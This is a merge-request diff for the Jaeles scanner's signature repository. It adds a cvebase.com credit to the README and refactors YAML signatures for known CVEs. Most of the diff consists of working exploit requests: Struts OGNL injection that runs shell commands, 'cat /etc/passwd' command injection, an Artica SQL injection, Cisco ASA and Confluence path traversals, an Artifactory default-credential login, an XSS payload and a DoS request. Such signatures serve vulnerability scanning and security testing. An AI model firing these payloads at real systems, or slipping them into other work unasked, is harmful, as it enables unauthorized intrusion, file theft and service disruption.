Refactor merge request from cvebase.com

README.md

@@ -9,7 +9,6 @@
 
 ***
 
-
 <p align="center">
   <h4>
     This repo only contain Default Signatures for <a href="https://github.com/jaeles-project/jaeles">Jaeles</a> project. Pull requests or any ideas are welcome.
@@ -119,6 +118,18 @@ Fuzz signatures may have many false positive because I can't defined exactly wha
 Become a financial contributor and help us sustain our community. [[Contribute](https://opencollective.com/jaeles-project/contribute)]
 
 
+## Special Thanks
+
+<p align="center">
+<img src="https://raw.githubusercontent.com/cvebase/cvebase.com/main/assets/cvebase-logo.png" alt="cvebase" title="cvebase" />
+<p align="center">
+Explore the latest vulnerabilities at <a href="https://cvebase.com" >cvebase.com</a>
+</p>
+</p>
+
+
+
+
 ## License
 
 `Jaeles` is made with ♥  by [@j3ssiejjj](https://twitter.com/j3ssiejjj) and it is released under the MIT license.

cves/apache-ofbiz-xss-cve-2020-9496.yaml

@@ -4,13 +4,12 @@ info:
   risk: Medium
 
 params:
-  - root: '{{.BaseURL}}/'
-
+  - root: '{{.BaseURL}}'
 
 requests: 
   - method: POST
     url: >-
-      {{.root}}webtools/control/xmlrpc
+      {{.root}}/webtools/control/xmlrpc
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
       - Origin: http://{{.Host}}

cves/apache-struts-rce-cve-2013-2251.yaml

@@ -4,7 +4,7 @@ info:
   risk: Critical
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
@@ -13,19 +13,19 @@ variables:
 requests:
   - method: GET
     url: >-
-      {{.root}}{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+      {{.root}}/{{.endpoint}}?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections:
       - >-
-        StatusCode() == 200 && StringSearch("resBody", "uid=")
+        StatusCode() == 200 && StringSearch("body", "uid=") && StringSearch("body", "gid=")
   - method: GET
     url: >-
-      {{.root}}{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
+      {{.root}}/{{.endpoint}}?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections:
       - >-
-        StatusCode() == 200 && StringSearch("resBody", "uid=")
+        StatusCode() == 200 && StringSearch("body", "uid=") && StringSearch("body", "gid=")
 references:
   - https://www.cvebase.com/cve/2013/2251

cves/apache-struts-rce-cve-2017-5638.yaml

@@ -4,7 +4,7 @@ info:
   risk: Critical
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
 requests:
@@ -15,10 +15,10 @@ requests:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
       - Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Jaeles','cvebase')}.multipart/form-data"
       - Pragma: no-cache
-      - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
-
+      - Accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*'
     detections:
       - >-
         StatusCode() == 200 && StringSearch("resHeaders", "X-Jaeles: cvebase")
+
 references:
   - https://www.cvebase.com/cve/2017/5638

cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml

@@ -4,7 +4,7 @@ info:
   risk: High
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
@@ -13,7 +13,7 @@ variables:
 requests: 
   - method: GET
     url: >-
-      {{.root}}{{.endpoint}}
+      {{.root}}/{{.endpoint}}
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections:

cves/apache-tomcat-open-redirect-cve-2018-11784.yaml

@@ -7,12 +7,12 @@ requests:
   - method: GET
     redirect: false
     url: >-
-      {{.BaseURL}}//google.com
+      {{.BaseURL}}//bing.com
     headers:
       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     detections:
       - >-
-        StatusCode() == 302 && StringSearch('resHeader', 'google.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*')
+        StatusCode() == 302 && StringSearch('resHeader', 'bing.com') && !RegexSearch('resHeader', 'Location.*{{.Domain}}.*')
 
 reference:
   - https://www.cvebase.com/cve/2018/11784

cves/apache-tomcat-put-cve-2017-12615.yaml

@@ -1,12 +1,12 @@
 id: CVE-2017-12615
+single: true
 info:
   name: Tomcat PUT method allowed
   risk: High
 
 variables:
   - ran: RandomString(6)
 
-
 requests:
   - method: PUT
     redirect: false

cves/apache-tomcat-rce-cve-2020-9484.yaml

@@ -4,12 +4,12 @@ info:
   risk: Critical
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 requests: 
   - method: GET
     url: >-
-      {{.root}}cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
+      {{.root}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
       - Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy

cves/artica-web-proxy-sqli-cve-2020-17506.yaml

@@ -4,12 +4,12 @@ info:
   risk: Critical
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 requests: 
   - method: GET
     url: >-
-      {{.root}}fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
+      {{.root}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections:

cves/artifactory-improper-authorization-cve-2019-9733.yaml

@@ -4,28 +4,29 @@ info:
   risk: Critical
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
       artifactory/ui/auth/login
 requests: 
   - method: GET
     url: >-
-      {{.root}}{{.endpoint}}?_spring_security_remember_me=false
+      {{.root}}/{{.endpoint}}?_spring_security_remember_me=false
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
       - X-Requested-With: artUI
       - serial: 58
       - X-Forwarded-For: 127.0.0.1
       - Request-Agent: artifactoryUI
       - Content-Type: application/json
-      - Origin: http://{{Hostname}}
-      - Referer: http://{{Hostname}}/artifactory/webapp/
+      - Origin: http://{{.Host}}
+      - Referer: http://{{.Host}}/artifactory/webapp/
       - Accept-Encoding: gzip, deflate
       - Accept-Language: en-US,en;q=0.9
       - Connection: close
-    body: {"user":"access-admin","password":"password","type":"login"}
+    body: |
+      {"user":"access-admin","password":"password","type":"login"}
     detections:
       - >-
         StatusCode() == 200 && RegexSearch("resBody", '"username": "access-admin"')

cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml

@@ -4,21 +4,23 @@ info:
   risk: High
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
       rest/tinymce/1/macro/preview
+
 requests: 
   - method: POST
     url: >-
-      {{.root}}{{.endpoint}}
+      {{.root}}/{{.endpoint}}
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-    body: {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
+    body: |
+      {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
     detections:
       - >-
-        StatusCode() == 200 && StringSearch("resBody", "<param-name>contextConfigLocation</param-name>")
+        StatusCode() == 200 && StringSearch("resBody", "<param-name>contextConfigLocation</param-name>") && StringSearch("resHeaders", "application/xml")
 
 references:
   - https://www.cvebase.com/cve/2019/3396

cves/atlassian-confluence-xss-cve-2018-5230.yaml

@@ -4,19 +4,22 @@ info:
   risk: High
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: "{{.BaseURL}}"
 
-variables:
-  - endpoint: |
-      pages/includes/
-requests: 
+replicate:
+  ports: '8080'
+  prefixes: 'jira, wiki, confluence'
+
+requests:
   - method: GET
+    redirect: false
     url: >-
-      {{.root}}{{.endpoint}}status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
+     {{.root}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm
     headers:
-      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
     detections:
       - >-
-        StatusCode() == 200 && StringSearch("resBody", 'SRC="javascript:alert(1337)">')
+        StatusCode() == 200 && StringSearch('response', 'javascript:alert(1337)') && StringSearch('response', 'LowestInnerExceptionMessage')
+
 references:
   - https://www.cvebase.com/cve/2018/5230

cves/atlassian-rce-cve-2019-11580.yaml

@@ -4,15 +4,15 @@ info:
   risk: Critical
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
       crowd/plugins/servlet/exp
 requests: 
   - method: GET
     url: >-
-      {{.root}}{{.endpoint}}?cmd=cat%20/etc/passwd
+      {{.root}}/{{.endpoint}}?cmd=cat%20/etc/passwd
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections:

cves/cisco-asa-path-traversal-cve-2018-0296.yaml

@@ -4,15 +4,15 @@ info:
   risk: High
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
       +CSCOU+/
 requests: 
   - method: GET
     url: >-
-      {{.root}}{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions
+      {{.root}}/{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections:

cves/cisco-asa-path-traversal-cve-2020-3187.yaml

@@ -4,7 +4,7 @@ info:
   risk: Critical
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
@@ -13,7 +13,7 @@ variables:
 requests: 
   - method: GET
     url: >-
-      {{.root}}{{.endpoint}}
+      {{.root}}/{{.endpoint}}
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections:

cves/cisco-asa-path-traversal-cve-2020-3452.yaml

@@ -1,5 +1,4 @@
 id: CVE-2020-3452
-donce: true
 info:
   name: Cisco ASA - Unauthenticated LFI and Delete File (CVE-2020-3452)
   risk: High
@@ -12,7 +11,7 @@ requests:
   - method: GET
     redirect: false
     url: >-
-      {{.root}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
+      {{.root}}//+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
     headers:
       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     detections:
@@ -23,14 +22,13 @@ requests:
   - method: GET
     redirect: false
     url: >-
-      {{.root}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session_password.html&default-language&lang=../
+      {{.root}}//+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session_password.html&default-language&lang=../
     headers:
       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
     detections:
       - >-
         StatusCode() == 200 && StringSearch("body", "GET_OUT_RESOURCE") && StringSearch("resHeaders", "application/octet-stream")
 
-
 reference:
   - links:
     - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

cves/cisco-dos-cve-2020-16139.yaml

@@ -4,15 +4,15 @@ info:
   risk: Low
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
       localmenus.cgi
 requests: 
   - method: POST
     url: >-
-      {{.root}}{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+      {{.root}}/{{.endpoint}}?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections:

cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml

@@ -4,15 +4,15 @@ info:
   risk: High
 
 params:
-  - root: '{{.BaseURL}}/'
+  - root: '{{.BaseURL}}'
 
 variables:
   - endpoint: |
       cgi-bin/config.exp
 requests: 
   - method: GET
     url: >-
-      {{.root}}{{.endpoint}}
+      {{.root}}/{{.endpoint}}
     headers:
       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
     detections: